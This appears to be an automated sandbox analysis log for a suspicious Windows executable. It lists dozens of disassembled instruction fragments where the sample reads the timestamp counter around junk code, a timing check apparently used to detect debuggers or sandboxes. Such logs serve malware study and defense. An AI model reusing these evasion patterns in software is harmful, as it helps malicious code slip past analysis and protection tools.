Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6BFC62 second address: 6BFC82 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jp 00007F3B648E95F6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], esi 0x0000000f mov edi, dword ptr [ebp+124591C5h] 0x00000015 nop 0x00000016 push eax 0x00000017 push edx 0x00000018 push ebx 0x00000019 ja 00007F3B648E95F6h 0x0000001f pop ebx 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6BFD38 second address: 6BFD3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6C03A1 second address: 6C03AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6A14EB second address: 6A151C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B64CCE616h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F3B64CCE60Ch 0x0000000e pop esi 0x0000000f jng 00007F3B64CCE61Eh 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6A151C second address: 6A1520 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6F09CF second address: 6F09EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F3B64CCE615h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6F0B30 second address: 6F0B58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B648E95FCh 0x00000007 jmp 00007F3B648E9608h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6F7C90 second address: 6F7CBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jmp 00007F3B64CCE60Fh 0x0000000d popad 0x0000000e jl 00007F3B64CCE60Ch 0x00000014 jnc 00007F3B64CCE606h 0x0000001a push edx 0x0000001b jne 00007F3B64CCE606h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6F6C98 second address: 6F6CB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F3B648E9602h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6F6CB2 second address: 6F6CD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3B64CCE619h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6F7128 second address: 6F7138 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3B648E9602h 0x00000008 je 00007F3B648E95F6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6F7138 second address: 6F7158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F3B64CCE60Eh 0x0000000e pushad 0x0000000f popad 0x00000010 js 00007F3B64CCE606h 0x00000016 jmp 00007F3B64CCE60Ah 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6F669F second address: 6F66A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6F76A1 second address: 6F76AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F3B64CCE606h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6FB0F0 second address: 6FB0F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 700AAF second address: 700ACE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3B64CCE616h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 700ACE second address: 700AD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6FF61C second address: 6FF622 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6FF790 second address: 6FF796 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6FFA95 second address: 6FFAA8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3B64CCE60Dh 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6FFAA8 second address: 6FFAB8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F3B648E9602h 0x00000008 jne 00007F3B648E95F6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6FFBEC second address: 6FFBF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F3B64CCE606h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6FFBF8 second address: 6FFC0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6FFC0A second address: 6FFC10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6FFECC second address: 6FFEEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jc 00007F3B648E95F6h 0x0000000c popad 0x0000000d push ecx 0x0000000e jmp 00007F3B648E95FFh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6FFEEB second address: 6FFEFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007F3B64CCE60Ah 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 700035 second address: 700051 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B648E9608h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 7001AB second address: 7001B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 7001B1 second address: 7001B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 7001B5 second address: 7001BF instructions: 0x00000000 rdtsc 0x00000002 jc 00007F3B64CCE606h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 7001BF second address: 7001CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 je 00007F3B648E95F6h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 7001CB second address: 7001DC instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3B64CCE606h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 7001DC second address: 7001EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 7001EA second address: 7001EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 7001EF second address: 7001FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F3B648E95F6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 70035F second address: 700363 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 700363 second address: 700388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F3B648E95F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3B648E9607h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 7004FE second address: 700503 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 700911 second address: 70092C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F3B648E95FDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c jp 00007F3B648E95F6h 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 70611D second address: 70612C instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3B64CCE608h 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 67735E second address: 677364 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 677364 second address: 677372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F3B64CCE612h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 677372 second address: 677378 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 677378 second address: 677380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 677380 second address: 677384 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 70924B second address: 70924F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 675868 second address: 67586E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 67586E second address: 675872 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 675872 second address: 675876 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 675876 second address: 67589F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F3B64CCE617h 0x0000000c pop esi 0x0000000d pop eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jno 00007F3B64CCE606h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 708AF8 second address: 708B00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 708B00 second address: 708B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 708C95 second address: 708C99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 708C99 second address: 708CAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3B64CCE60Fh 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 708CAE second address: 708CB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 708CB3 second address: 708CBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 70F18F second address: 70F1AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B648E9606h 0x00000009 popad 0x0000000a pop edi 0x0000000b pushad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 70F1AF second address: 70F1C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007F3B64CCE611h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 70F449 second address: 70F48A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B648E95FEh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jbe 00007F3B648E960Fh 0x00000011 pop ecx 0x00000012 pushad 0x00000013 push edi 0x00000014 push edi 0x00000015 pop edi 0x00000016 pop edi 0x00000017 js 00007F3B648E9611h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 70F708 second address: 70F70D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 70F70D second address: 70F712 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 70F712 second address: 70F718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 710454 second address: 710458 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 7130DC second address: 7130E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 7130E2 second address: 71310D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B648E95FFh 0x00000009 popad 0x0000000a push ebx 0x0000000b jmp 00007F3B648E9604h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 713244 second address: 713273 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 jmp 00007F3B64CCE617h 0x0000000d jmp 00007F3B64CCE60Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 713273 second address: 713278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 713278 second address: 71327D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 7176E1 second address: 7176ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007F3B648E95F6h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 7176ED second address: 7176FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 7176FC second address: 717700 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 717700 second address: 71770D instructions: 0x00000000 rdtsc 0x00000002 je 00007F3B64CCE606h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 71770D second address: 717724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B648E95FFh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 716922 second address: 71692C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3B64CCE60Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 71692C second address: 716933 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 716BF6 second address: 716C1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B64CCE611h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c jmp 00007F3B64CCE60Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 716C1B second address: 716C3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b jnp 00007F3B648E95F6h 0x00000011 jmp 00007F3B648E95FFh 0x00000016 popad 0x00000017 push edi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 716C3F second address: 716C4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F3B64CCE606h 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 716DBD second address: 716DD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F3B648E9606h 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 716DD9 second address: 716DFB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3B64CCE610h 0x0000000d jmp 00007F3B64CCE60Ah 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 7170BF second address: 7170C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 7170C3 second address: 7170C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 717237 second address: 717253 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B648E9606h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 717253 second address: 717279 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3B64CCE608h 0x00000008 jmp 00007F3B64CCE615h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 71FA2B second address: 71FA31 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 71FA31 second address: 71FA41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F3B64CCE621h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 71DDAA second address: 71DDB6 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3B648E95F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 71E0E5 second address: 71E0EB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 71E3AA second address: 71E3B4 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F3B648E95F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
